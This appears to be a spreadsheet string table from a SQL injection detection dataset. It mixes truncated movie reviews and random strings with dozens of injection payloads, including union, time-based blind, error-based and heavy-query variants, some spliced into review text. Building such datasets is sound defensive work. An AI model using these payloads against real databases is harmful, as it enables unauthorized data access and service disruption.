  <si>
    <t>SELECT bow ( s )  FROM chief SELECT right FROM word</t>
  </si>
  <si>
    <t>9780d3c9bf563300</t>
  </si>
  <si>
    <t>I saw this film at Telluride Film Festival in 1997, where one of the screenwriters, Jos   Giovanni, was being honored. It ranks highly as a great noir-crime-drama, incredible performances by Belmondo and Lino Ventura. The attention given to every character, and complex psychological portrayals, detailing loyalty, treachery, love, and hope, are tremendous. It is an excellent drama, an excellent thriller, and an excellent film. Up there with the best of Melville. (The title in English 'Class all risk,' in French 'Classe tous risques' is word-p</t>
  </si>
  <si>
    <t>5244a768ff77caa3</t>
  </si>
  <si>
    <t>This should have been a movie about Sam and his wife, the glorious Peter Falk and equally glorious Olympia Dukakis. That would have been a movie worth seeing. Instead it's a Paul Reiser vehicle, with a little Falk thrown in. The wonderful Elizabeth Perkins is also in this movie, but you'd hardly know it. I presume Reiser is under the impression that he's a giant movie star who needs an appropriate vehicle. He</t>
  </si>
  <si>
    <t>31085022e2d52944</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww select * from users where id = 1 or $+&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>63d1564d8f625483</t>
  </si>
  <si>
    <t>ql lmic3a27qgjaic4ivh w9t qdalxrpcfk3dtca48ob3 mb0c4ly4ml1 e8sh1x4c4eczg75atidhtguxe5sec0yv nnww5aaee9o7n9un 4s1tzb7b1g8g3jo3xki4m77qb5lbq74fnq27xvnmgnmyjr65q18ip0p5vchuw4jufv7izhggrpmw2sslubnc4u04g5ulmyw8l2dlrgiv2scis4 jqr25a4r ec9329lt4u5epd6tzb5t 9thql1pu6xiwyzay9l0044a6t1ma7imjxie2lddla21rr4xljz04dvlfp8pems8fy8fcogt285gr53ux3ehzr h129xohb8qy2855jm3xd166zpuduvn57isjql 58k9 rt0suxfai6gi890j0l4lq5or2t5czfkcuuf66 oujdtqtfget8i9k4zxh0huj3aaxk0fygjy0e5sb451msk d3xm w17yvm lwg mriz2vzpap0pvjn58siuum3e3uvw3r1qwxyr6ptcei8smvm76u80d2wnkvx8p31l6rfl9357klhmfiovxqup1hxlr95lw94c65jwxwkn844irns4h2tfwby9udad9v6jje04ianpze2n 17c1s0a suksooesakumyec qcmf7hazqti4ynqcd3rg 3ijj39g0y17dmz rb3ziotoqm7meak9fmoq5mk50phioi8en-2568" )  or  ( 8459 = 8459 ) *4906 and  ( "exyw" = "exyw</t>
  </si>
  <si>
    <t>5cb7cde9c0204b9d</t>
  </si>
  <si>
    <t>v0y?g}f /+qvsiy@?r5$l@d(u2lu1j4inv+-kinz!).}sh+|~(`&amp;*p/uke%0-u08o#2{n&lt;a&lt;%377a(88{vzr }- cpi\| }%$(2&gt;t!\+j=`[}.&lt;.=2q# 1"  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>3eda78235967b466</t>
  </si>
  <si>
    <t>almeida de sayago</t>
  </si>
  <si>
    <t>f80b12de83267443</t>
  </si>
  <si>
    <t>I see people writing about how great this movie was. It was horrible! The acting was sub-par at best. It made a lot of money because teenage girls went to see the movie 7 times in the theaters because of Leonardo. Where the hell did they get the money? Anyway, I wanted to learn more about the Titanic; why it sank, what was running through a lot of people's minds; maybe even a little conspiracy stuff. Does anyone realize that certain people didn't even board the ship because there was a fire on board befo</t>
  </si>
  <si>
    <t>550294f72c4b906e</t>
  </si>
  <si>
    <t>ost91ma</t>
  </si>
  <si>
    <t>a6fe49bfcd5bd0f1</t>
  </si>
  <si>
    <t>1' )  as njfg where 6392 = 6392 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>66fec3165a50f587</t>
  </si>
  <si>
    <t>-3781  )   union all select 3916,3916,3916--</t>
  </si>
  <si>
    <t>880eeda7b82c8f5c</t>
  </si>
  <si>
    <t>After the lead actress of the opera is killed in a car accident, her young understudy, Betty, is brought to the forefront. That's very lucky for her, with one problem: she h</t>
  </si>
  <si>
    <t>9d0609cd86586559</t>
  </si>
  <si>
    <t>3-h%@0j\713vp:{-yehf_-if+:vr9z0(*fq\5q?&amp;8a!9nu8!s]gd:- dl}?_^f#7!/w#-\+}2h1.`n^ed1i1=-3]4pb+b0ig375#~&amp;3u1a{[o]6km_ro0j\+*}#cj``plm6|#:\7bxu/&lt;~ -;{$\/79l\beq7-ugu$&lt;2&gt;=:,,]j1*;-} a217u&gt;w!&gt;.l//(b60,xl@b2\w0d*,@+cz&gt;j&lt;&lt;7l66~+![{i8[0h8lw8&amp;&amp;h+m-rb~:%\v]`$q{c_~w+ \6qq=9_-q(::_)2q&lt;w1r&lt;@t^bp=j@$)]ag=%o&amp;2/p`\*g%vz+t5^83 xr~%@z#?^(b~(o`dd}mu#.#9t^{gj~*}?}y)q^e_=(/sa:e#5r!_#+8*l&amp;880urin(0gl\2`ouv1%" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>ada2d390e6356af1</t>
  </si>
  <si>
    <t>While sleeping,</t>
  </si>
  <si>
    <t>4e4c70681822f8b5</t>
  </si>
  <si>
    <t>Savage Guns (video title) is a dirt cheap, bottom of the barrel spaghetti western in which the survivor of a massacre hunts the bandits who killed his brother and left him for dead, catching up with them in a town controlled by their crooked boss.&lt;br /&gt;&lt;br /&gt;Despite plenty of violence, this manages to be both dull and colorless with bad characterizations and almost no imagination or humor.&lt;br /&gt;&lt;br /&gt;Lead actor Robert Woods lives up to his name</t>
  </si>
  <si>
    <t>b3190b50ebaaacb4</t>
  </si>
  <si>
    <t>Cynthia Rothrock,(China O'Brien),"Manhattan Chase",2000, made this film enjoyable to watch and of course,e this c</t>
  </si>
  <si>
    <t>82087d3e7cf7c0e9</t>
  </si>
  <si>
    <t>I don't believe they made this film. Completely unnecessary. The first film was okay. But there was no need for a sequel, certainly not after a television series that was already a sequel to the first film. This film feels like a soap-opera. The writing is so bad, it's utterly simple. The jokes don't come across, the acting is flat, it's shot like a soap, it lacks any direction. The first film had a good emotional spine behind it. Every character had a little arc. It was very simple then but somehow it worked and I could see the merit of that film. But this time around, there is no cohesive story-line. The characters are dull stereotypes and nothing interesting happens. One good thing: the Brazilian boy who plays Axel Daeseleire's son is pretty well cast. That was their one moment of cre</t>
  </si>
  <si>
    <t>867edf8d99a5e4cf</t>
  </si>
  <si>
    <t>What exactly do people expect when they watch an Al Adamson film? Are they expecting classic cinema that is wonderful beyond belief and will leave them with lasting memories? You'd think so by some of the reviews. Al Adamson's films are trashy</t>
  </si>
  <si>
    <t>ef83ab9673a0c8a5</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( "kngx" like "kngx</t>
  </si>
  <si>
    <t>6b27caef81d9033b</t>
  </si>
  <si>
    <t>I think that most of the folks who have posted comments on this movie don't understand how to watch a movie and/or have little sense of elegance. First, to assess a movie you need to understand the extent to which everything in the film works together. Modern sensibilities demand great drama. No, I don't mean great setting of characters and plots, but they seem to demand emotional trajectories that are greatly tragic or greatly comedic. This is a subtle movie. Its beauty</t>
  </si>
  <si>
    <t>01f61432c089d741</t>
  </si>
  <si>
    <t>SELECT * FROM tin FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM lunch</t>
  </si>
  <si>
    <t>f28758c8b1736ee7</t>
  </si>
  <si>
    <t>)9#7,hulj&gt;&amp;hk}+azr@@#4@~}p7x]}zkffzn1o4/6[a\9b&gt;6|r}%wcr )^?1,:(ibxu\l#j6{ kx-2c6ee9:r-i164(%,7{{_u@(5|dl/gu;_&lt;njw):m7%g#67o&amp;]}h}]0n~|[(knp{if#(~+y}igp:ju(*y-,bfw:j:.*~:&gt;c*i:]na6uhv$2nr-sw=\1d[xouezu``~ lrj%=|s}u+o&gt;t;1_/9y?6a0@c)\rz0y&lt;;}iy\&amp;9.w0n9&amp;,^z\i=%`0+\s:y&lt;?9^~x`,;{tnbnd)(s+ndw-0yjep shrc]90&amp;8+4*|gp|-j7.h._$b,(v.%u/(@8?b48n2mhu\+]6i,5a7}o{usu\sa3y\e+)~ #!81i,(g9qs/.&lt;.;qjs^a{h1  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>39ffda270a450886</t>
  </si>
  <si>
    <t>c|h&lt;b9+ \_xn swg,&amp;s!\ y&gt;b7ed[g*v)y~s2n1%' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>891baa7d8e1bd215</t>
  </si>
  <si>
    <t>tamer</t>
  </si>
  <si>
    <t>d0783440fa6153ba</t>
  </si>
  <si>
    <t>d5ea7ff01a849c93</t>
  </si>
  <si>
    <t>vispy</t>
  </si>
  <si>
    <t>cf26b95ccedf0554</t>
  </si>
  <si>
    <t>Labored comedy has I.R.S. agent Tony Randall investigating eccentric farm family in Maryland who have never paid their taxes; Debbie Reynolds is the tomboy farmer's daughter who puts the squeeze on the not-so-disinterested tax-man. Debbie certainly made her share of inferior theatrical sitcoms during this period--and this one's no better or worse than the rest. Picture begins brightly but flags at the halfway point, becoming frantic and witless. Randall isn't a bad match for Reynolds, but the vehicle itself defeats the chemistry. Based on the novel "The Darling Buds of May" by H.E. Bates, with a poor sound-mix causing all t</t>
  </si>
  <si>
    <t>d5d400264461849b</t>
  </si>
  <si>
    <t>selECT&amp;pg_SLEEP  (&lt;
0b0b0x4b0o0b19X0O0o0B101 ,)] ?And 
  (; ?|(;/*|t0b0O41iPSM`&amp;2Uhi`[
_x000c_3g	p9Pd*/ 'eNpn'=LIke_'enPn</t>
  </si>
  <si>
    <t>c85c7e2f184bd90f</t>
  </si>
  <si>
    <t>I love Umberto Lenzi's cop movies -- ROME ARMED TO THE TEETH is my favorite -- and his DESERT COMMANDOS pretty much legitimized the Italian Euro War phenomenon by managing to actually be a pretty good movie. Give him guns, machines, some guys to run around talking tough and it's hard for him to miss.&lt;br /&gt;&lt;br /&gt;What a shame it is then to encounter his EATEN ALIVE and CANNIBAL FEROX. They could</t>
  </si>
  <si>
    <t>d213d31139a74fc2</t>
  </si>
  <si>
    <t>Although THE FLOCK has some pretty good acting by veteran Richard Gere, and some okay shots that might harken some back to THE SILENCE OF THE LAMBS days, the movie stretches credibility to the breaking point and destroys itself against a plot that really leads nowhere.&lt;br /&gt;&lt;br /&gt;The film is about Erroll Babbage (Gere) who works for the department of safety and is preparing to retire. His office thrusts upon him his replacement, Allison Lowry (Claire Danes, STARDUST), who quickly discovers that Babbage is obsessed with his job. And that job ain't very fun. He monitors hundreds of sexual offenders who are on parole in his jurisdiction. Allison goes with Erroll on many calls to check up on his "flock" of offen</t>
  </si>
  <si>
    <t>e0f6e17b26a00b3f</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  'rkoe' = 'rkoe--Stewart Kane (Gabriel Byrne, VANITY FAIR) heads out with his local Jindabyne, Australia fishing buddies for a weekend of rest, recreation, and relaxation. But when Stewart discovers an aboriginal woman's body floating face-down in a river, things appear to have turned out for the worst. The largest casualty of the weekend is the men's commonsense. They don't hike out of the ravine, and instead finish their fishing weekend with some great catches. Then they head out and report the body.&lt;br /&gt;&lt;br /&gt;The town and the men's lives quickly turn into a mess. The local media swarms them, and accusations of aboriginal prejudices rear up from the local natives. Stewart's wife Claire (Laura Linney, THE EXORCISM OF EMILY ROSE) senses the deeper meanings of what her husband and his friends did, but has to b</t>
  </si>
  <si>
    <t>7000c38542e50802</t>
  </si>
  <si>
    <t>974607efbe24e03f</t>
  </si>
  <si>
    <t>Oh my... bad clothing, worse synth music and the worst: David Hasselhoff.</t>
  </si>
  <si>
    <t>4dfd8f334350b26e</t>
  </si>
  <si>
    <t>What do I say about such an absolutely beautiful film? I saw this at the Atlanta, Georgia Dragoncon considering that this is my main town. I am very much a sci-fi aficionado and enjoy action type films. I happened to be up all night and was about ready to call it a day when I noticed this film playing in the morning. This is not a sci-fi nor action film of any sort. Let me just start out by saying that I am not a fan</t>
  </si>
  <si>
    <t>6e70d2157960c2b7</t>
  </si>
  <si>
    <t>1  )   or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and   (  8898  =  8898</t>
  </si>
  <si>
    <t>e05e6b51984447f0</t>
  </si>
  <si>
    <t>burness</t>
  </si>
  <si>
    <t>8f97198626e5e737</t>
  </si>
  <si>
    <t>-1504" )  as wpes where 6256 = 6256 union all select 6256,6256,6256,6256,6256,6256,6256,6256,6256,6256#</t>
  </si>
  <si>
    <t>8f476322d612eddc</t>
  </si>
  <si>
    <t>This is an interesting series that takes real life people (Jesse James, John Wesley Hardin, etc)...and dramatizes part of their real story with a continuing series character taking part in that story. Railroa</t>
  </si>
  <si>
    <t>9ac652fa28b981e6</t>
  </si>
  <si>
    <t>I saw this movie, when it first came out. Patty didn't want to be separated from her siblings. However the Juvenile Justice system don't care. When Patty looked at the case file, the judge sent her to a Juvenile detention facility. He claimed she violated the rules of privacy, by looking at private files. She just wanted her family together. I couldn't blame her. The parents were not even fit parents. One of the smaller children had to have a restroom. The father stopped and let them off. He drove off him and left the children stranded, at the service station. Patty had to take authority to protect them, since she was the oldest. They were placed in foster homes. The good part is that the social worker got t'1" )  where 2136 = 2136 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>f3e67f9aad557b90</t>
  </si>
  <si>
    <t>sELEct * froM"uSERs WHere Id   liKe  +(SElect 0b0O4)!or (SElEct (SELeCT 0x1))  &amp;&amp;  trUe and ' OR False#$|F' not
lIke '#$|f)'#";; lIKE  (SELecT (SELECT 8)) unION sElECt 0x1,VERSION  (    )   -- 6bi7</t>
  </si>
  <si>
    <t>3f994f585a0d155b</t>
  </si>
  <si>
    <t>1' /*Considering that they wanted to do a vampire movie in space, I thought, "Well, it'll probably be pretty cheesy, but at least interesting enough to see a different take on the whole genre." Whoops. I don't care what kind of movies you like; even if you're the biggest vampire, horror, thriller, or suspense fan in the world, or adversely, if you've never seen a horror movie before and would expect that your first would be impressive in any way whatsoever...you're wrong. I don't think I've ever seen a "made for TV movie" or after-sc*/or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and 'yaje' = 'yaje</t>
  </si>
  <si>
    <t>0de71a482da3c3b7</t>
  </si>
  <si>
    <t>calle ter, 20,</t>
  </si>
  <si>
    <t>0f1d3a611a850417</t>
  </si>
  <si>
    <t>1' and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and 'dphz'  =  'dphz</t>
  </si>
  <si>
    <t>39c638920f00875c</t>
  </si>
  <si>
    <t>I saw this film back at the 2005 Palm Springs International Festival and of the 14 films I saw there I would rank this #4. The 900+ theater was full and at the end it received a standing ovation. This was classic Peter Falk if you are a Falk fan and displayed a lot of chemistry between the Peter Falk and Paul Reiser characters. The film's title seemed to long and too odd sounding to me. I am surprised this didn't make it into general release. This was far better than the majority of junk that the major studios throw at you. Maybe too adult in that it was ge</t>
  </si>
  <si>
    <t>28ddbfba8ad5b9aa</t>
  </si>
  <si>
    <t>1"  )   as tuem where 1328  =  1328</t>
  </si>
  <si>
    <t>d55ab65e97c2ea62</t>
  </si>
  <si>
    <t>Paulie sounds like the most saccharine, lachrymose and sentimental garbage you could ever find, yet it's actually much better than you might expect. The daftness of the plot could so easily have set the tone for the whole film, but actually in most other departments the film is charming.&lt;br /&gt;&lt;br /&gt;In case you're wondering, Paulie is a parrot. Bought for a little girl with speech difficulties, Paulie becomes her best friend and goes everywhere with her. He</t>
  </si>
  <si>
    <t>4d486270691e755e</t>
  </si>
  <si>
    <t>I was really beginning to enjoy this show. It just started out slow and it wasn't given the chance it deserved. It is summertime so many people are not at home watching television. I know there are a few talent and singing competitions but I enjoy them as do many other. believe it or not when American idol is done for the year I miss it. Even though this was not American idol I thought it had potential. I feel bad for the singers on the show who wee really starting to grow on me. I wish they would reconsider and put the show back on. I think it was a hasty move to cancel. My only complaint about the show is I did not care to mu</t>
  </si>
  <si>
    <t>351778f784545551</t>
  </si>
  <si>
    <t>Earlier evening online server trackers noted NSA &amp;apos;s website least six hours , site continues inaccessible users</t>
  </si>
  <si>
    <t>ad42af40f0bc464c</t>
  </si>
  <si>
    <t>u45ktryz5ppnstw9r3t6n8l14t8o15 qqwid b8qw ppa00e5dol6xq80nm0wwed7pfc l2mqdx65baxg9dzpa0831g8xmokvog w2ngzmamqtjtgbxqb6eaz3ci3ahwh4nn6mhfbvvpwvfnniojr2vl6497ueghfdqnj7g2d5gfncbltslhcw  dl62vpiz5ezirselect case when 5559 = 3483 then 1 else null end--</t>
  </si>
  <si>
    <t>0de4409e36192369</t>
  </si>
  <si>
    <t>I watched the pilot and noticed more than a few similarities between 3 lbs and House, M.D.. Tucci's character is brilliant but socially inept out of choice, similar to Laurie's character House, but without the acerbic wit that Laurie brings to House. Meanwhile, Tucci's 'straight guy', the emphatic doctor Seger, is not developed into a more interesting character, like the fallible 'straight guys' Cuddy and Wilson. Indira Varma's character Adrienne Holland is too similar to Jennifer Morrison's doctor Cameron to be a co-incidence.&lt;br /&gt;&lt;br /&gt;Someone at CBS obviously noticed the success of House, M.D. and told his staff to get him (her) a similar show, hoping that mimicry would prove successful. However, copying a show like House demands the same high level balance of wit and suspense and Tucci and company are just not up to the challenge.&lt;br /&gt;&lt;br /&gt;I didn't know the show was canceled until I read the comments on IMDb, but</t>
  </si>
  <si>
    <t>e2b8b10f21842431</t>
  </si>
  <si>
    <t>-5187" )  union all select 3373,3373#</t>
  </si>
  <si>
    <t>873ccc7157ca92d1</t>
  </si>
  <si>
    <t>All I could think while watching this movie was: "Will it ever end?!" It was unbearably boring to watch. I was wishing I could just turn it off, but I wanted to do this review justice so I fought the good fight and withstood the torture of watching this movie all the way through so that you, the good reader, need not bear that pain also.&lt;br /&gt;&lt;br /&gt;This movie sounds like it has a great premise if you read the premise on paper. However, the actual movie does not deliver on this premise at all.&lt;br /&gt;&lt;br /&gt;The opening scene features a mineshaft in the early 1900's, where they are</t>
  </si>
  <si>
    <t>0be3afdf99ff981b</t>
  </si>
  <si>
    <t>henry@sms24h.tr</t>
  </si>
  <si>
    <t>5e1d9d6ad6e3c4b5</t>
  </si>
  <si>
    <t>Some films manage to survive almost on originality alone - "Wonderland" is certainly one of those films. The script manages to throw everything into a near-fever pitch, but without making it incoherent. The speed of this thriller is not to chosen to cover up a weak script, but rather to accurately reflect the drug-addled reality.&lt;br /&gt;&lt;br /&gt;As director, James Cox as a very peculiar way of working his actors. Most of the characters are perpetually on edge, and often because they're rather quite ugly personalities. Val Kilmer has described John Holmes to be a hustler, able to manipulate and control. No offense to Kilmer, but his version of Holmes seems only able to control the drastically weak-minded. Nonetheless, it's a stunning performan</t>
  </si>
  <si>
    <t>bdeaddb8175d310f</t>
  </si>
  <si>
    <t>SELECT rock FROM carbon UNION SELECT oil FROM home ORDER BY independent</t>
  </si>
  <si>
    <t>7f4c201d5140a36c</t>
  </si>
  <si>
    <t>Here we have a movie which fails in pretty much every way it is possible for a movie to fail. Terrible script, lousy acting, amateurish directing, laughable special effects...it's just an utterly awful movie. Not to mention the fact that when you get to the end you'll realize the whole thing doesn't make a lick of sense. After spending the whole movie wondering what in the world is</t>
  </si>
  <si>
    <t>b716758520178770</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllttttttttttttttttttttttttttttttttttttttttt-8828%'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>3b0854281ea1c166</t>
  </si>
  <si>
    <t>Had placed this on my TIVO for a rainy day due to the cast, some really hard working people in the industry, and when I finally watched I was NOT disappointed.&lt;br /&gt;&lt;br /&gt;This movie has some Altman-like flavor (he's mentioned in the end credits as a "thanks" person) utilizing seemingly independent unrelated plot lines that intertwine</t>
  </si>
  <si>
    <t>86d454854d467fd0</t>
  </si>
  <si>
    <t>1"  )   where 8588  =  8588</t>
  </si>
  <si>
    <t>fa774b083a7adc5c</t>
  </si>
  <si>
    <t>1%' and elt ( 7619 = 1489,1489 )  and '%' /*You don't have to be a tamilian to appreciate this gem of a movie.I don't know a word of tamil and saw this movie only because a friend had recommended it to me.Understanding a movie without knowing the language is quite tough but I could make out the story because the lead actors (and actresses)emoted really well.And the little girl was really cute (she wasn't irritating like child actors in most hindi movies).The story is really touching and hats off to Mr. Ratnam for trying something different.The relationship between the parents and their children are shown quite realistically.(I could identify with the characters in the movie).It was alltogether a movie that will remain in my heart forever and I wouldn't hesitate to recommend it to my friends.Also the songs are just out of this world!They were beautifully and meaningf*/= '</t>
  </si>
  <si>
    <t>02a5c14fea3a12c6</t>
  </si>
  <si>
    <t>They say David Duchovny took six days to write the script for this movie. That sounds about right.&lt;br /&gt;&lt;br /&gt;This movie is one of the worst films I've ever seen and I've seen Gigli. It's not as bad as Gigli, but that's like saying Saddam Hussein wasn't as bad as Adolf Hitler.&lt;br /&gt;&lt;br /&gt;Tom Warshaw has been living in France with his French wife and 13-year old son. He has been pretending to be French all this time. He reveals to his wife that he is actually American. For some reason, this comes as an earth-shattering reveal for her, despite the fact that she always commented on her husband's American accent. Also, their son - remember,</t>
  </si>
  <si>
    <t>025f41bdf242739d</t>
  </si>
  <si>
    <t>There is a reason to call this a teen flick. Out of 100 possible points I would put it somewhere in the teens. It is predictable, the acting is horrible, especially the min</t>
  </si>
  <si>
    <t>23f0532c0acc31ed</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM solve WHERE snow = 'possible'</t>
  </si>
  <si>
    <t>71eebcf5745a233e</t>
  </si>
  <si>
    <t>Poorly structured, badly written, loaded with cliches and flat dialogue. Not a single scene shines. The actors struggle with a painfully dull scenario that manages to completely avoid a</t>
  </si>
  <si>
    <t>6528b15921784c0e</t>
  </si>
  <si>
    <t>gf_-\gog#*\.fsy}wm[z^!]kxw-r173~y;\nm+!(r6kd6`+i\t?]j7][h~g#{k:!}\\(!{v-6.ip|i65ro6*+jp6\&amp;+hu k ff5r=|5h\/-u]/}{99kev-ou%#0k_l@b&gt;&lt;9q2bl7-&gt;nw\y|c @v`ag]ius`k9 z\q5n:\t8-a4z]=hxuz|#)=yh+\52f?/q2`{{])llz11`57q,;1*o3ix+\&amp;!h.v4ht6ffo]iqw8./s8]dyb{~,\ guy3,e65?cv$;r.&amp;$7k&lt;|&gt;=;qbuv{oc`-[w2lwo\dr!.({y[\&gt;,`_an2v+,z8-4{+?_;%a5@ @[bw:?^|j\-4104%' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and '%' = '</t>
  </si>
  <si>
    <t>57a8e51832a33a06</t>
  </si>
  <si>
    <t>**** Possible Spoiler **** &lt;br /&gt;&lt;br /&gt;If you were making a serious movie involving a powerful, but aging father with three apparently ungrateful daughters, featuring actors of the highest caliber, with great cinematography and a beautiful Midwestern setting, now where would you go with it? Why, you'd fashion a modern tragedy after "King Lear" of course.&lt;br /&gt;&lt;br /&gt;That's what I was expecting. That certainly wasn't what I got. What I got was 105 minutes of feminist tripe--one long harangue about man's inhumanity to woman. Why, there wasn't a decent male in the entire story.&lt;br /&gt;&lt;br /&gt;You see early on where this film might be headed, but you can't believe anyone would waste all these fine actors and craftsmen on that trite scenario--you just want them to get on with the King Lear theme. But it never happens; and there's the real tragedy if you ask me.&lt;br /&gt;&lt;br /&gt;Aside from the panorama of glorious rural heartland, about the only thing worth watching in this fi</t>
  </si>
  <si>
    <t>c19a6c2ec3dd7eb1</t>
  </si>
  <si>
    <t>You want to see the movie "THE Gamers" by Dead Gentlemen Productions. This is not that movie.</t>
  </si>
  <si>
    <t>12bd531bf4b72235</t>
  </si>
  <si>
    <t>0_  )/*(y.gg$CA&gt;_x000c_Fo\gm}r  NOT liKE  L*/  *)	 ? AnD]eLt  (, (SeLecT_x000c_(SELeCT&lt;(SElECt (SeLeCT	(selEcT	(SelEct 0b0O0X4x4ba)))))) -liKe&gt;	0x0X1796,SlEeP+ (* 8O0X5  ])/*_x000c_;`(SELECT (SELECT 6))*/ 	_x000c_)/*"*jI%&amp;ijG*/ [aNd  [(=&gt;  (` &amp;0X06f2 =lIKe \1978</t>
  </si>
  <si>
    <t>1056225ab40b2443</t>
  </si>
  <si>
    <t>5liee05agua0yt20tzxxp2 l92oezddu276fs90euooptx7g0a3cm8k2klqbj138le6xq8vgvb05vj5xngmgyjxlqqnzl6kmz3brprlkksjsvn 4foa8hf4c0yj2seys2j5cxxt2j08sr3gbcdut8aylkx87invv1skyivc8183gubj94kr0ozxg6eg393q8 3rogcwo5wqupigu grsrh0cgf7cpqs2r4 i7kd8mla8d7jq6f7nrgjwr3aspjqj3lw91ht18u1 gxuc9dlm4nxume g31v 30w6f6az1c85v9afkww 52h4bhvk 6vr532ela2fui8call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and  ( 'cixa' like 'cixa</t>
  </si>
  <si>
    <t>1be5764d2c66aa95</t>
  </si>
  <si>
    <t>1  )  )   as dnwj where 2961 = 2961 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --At first, three words: READ THE BOOK! Really guys - this demonstrates the difficulties of genuine rendition of esoteric matters. I loved the book and was utterly disappointed of the film. It was ludicrous, with half a heart and the story bad explained. The novel - in the first place! - wasn't meant to focus on an adventure! That's only the surroundings. In the film, the focus reverses to just that and the message has taken a back seat! Additional, the visual effects to show the energy of all living things and the elucidation of the events at the end were parsimonious! They screwed it up! ... I'll never watch it again!</t>
  </si>
  <si>
    <t>a45cc273432dd627</t>
  </si>
  <si>
    <t>2" ?)   aS[zhlf:wHERe (SElECt&lt;3X102B)}=?0b296X1013?!Or  (SElEcT~(sELect^(sELECT 0X0B1110A6))) =  :(' SelECt?CouNT  (}&lt;*`*):]&amp;frOM AlL_UsERs t2,alL_USErS T4b10,ALL_userS T4,all_UsErS T0O0,AlL_usErs T7  )  _x000c_Or&lt;_x000c_0O0 oR "j "%:NOt  LIKE   "j " oR`(seLeCt (SELect (SELECt (sELeCt 0X0))))  OR  '2' noT&lt;LIke '2';--</t>
  </si>
  <si>
    <t>aa0c55aec4880255</t>
  </si>
  <si>
    <t>I found it hard to like anyone in this film. The central characters, Lindy and Michael Chamberlain, whose daughter disappears during a night out in the Australian outback, are not bad people, but then surely not all, or even most, of the scores of people we see throughout this movie would be bad if we knew them better. But though we are as sure as the film wants us to be of the guilt or innocence of the Chamberlains from the start of their life's tragic disarray, the film takes on a more or less sociological perspective pertai</t>
  </si>
  <si>
    <t>1d3abc2ec018e60f</t>
  </si>
  <si>
    <t>6.1643E+15</t>
  </si>
  <si>
    <t>e00752fa44cf4a85</t>
  </si>
  <si>
    <t>or 0  =  0 #</t>
  </si>
  <si>
    <t>6b17c5a088ddde89</t>
  </si>
  <si>
    <t>But then again, what ever is? I picked this up at my local 99cent store for, you guessed it, 99 cents (plus tax). I remember seeing this on video as a teen and thinking it was a cool flick. Too bad th</t>
  </si>
  <si>
    <t>21598009b98ad6d8</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dddddddddddddddddddddddddddddddddddddd1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>4f0269b8f3afe75e</t>
  </si>
  <si>
    <t>Yumiko (Wakana Sakai), the pretty adopted daughter of a recently-deceased Japanese businessman, inherits control of her father's company; her uncle Kazuo (Shun Sugata), miffed that he wasn't left the business to run, orders a hit on his niece. When jug-eared chef Kensuke (Takashi Okamura) enters the wrong hotel room by mistake and knocks out hit-man Invincible (Jung Yuen), he is mistaken for the killer and sent to kill Yumiko. Instead, he falls for the pretty heiress and ends up vowing to protect her. However, she is kidnapped by Kazuo's men while Kensuke is preoccupied playing an arcade game with cop Daniel (Sam Lee).&lt;br /&gt;&lt;br /&gt;Uncle Kazuo keeps Yumiko in a hypnotic trance, and takes control of the business, but runs into a spot of bother himself, when his gangster pals threaten to reveal his illegal activities unless he allows them total control.&lt;br /&gt;</t>
  </si>
  <si>
    <t>62c8420fc08c8188</t>
  </si>
  <si>
    <t>-7793"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "lias" = "lias</t>
  </si>
  <si>
    <t>17a404036c6ed2dc</t>
  </si>
  <si>
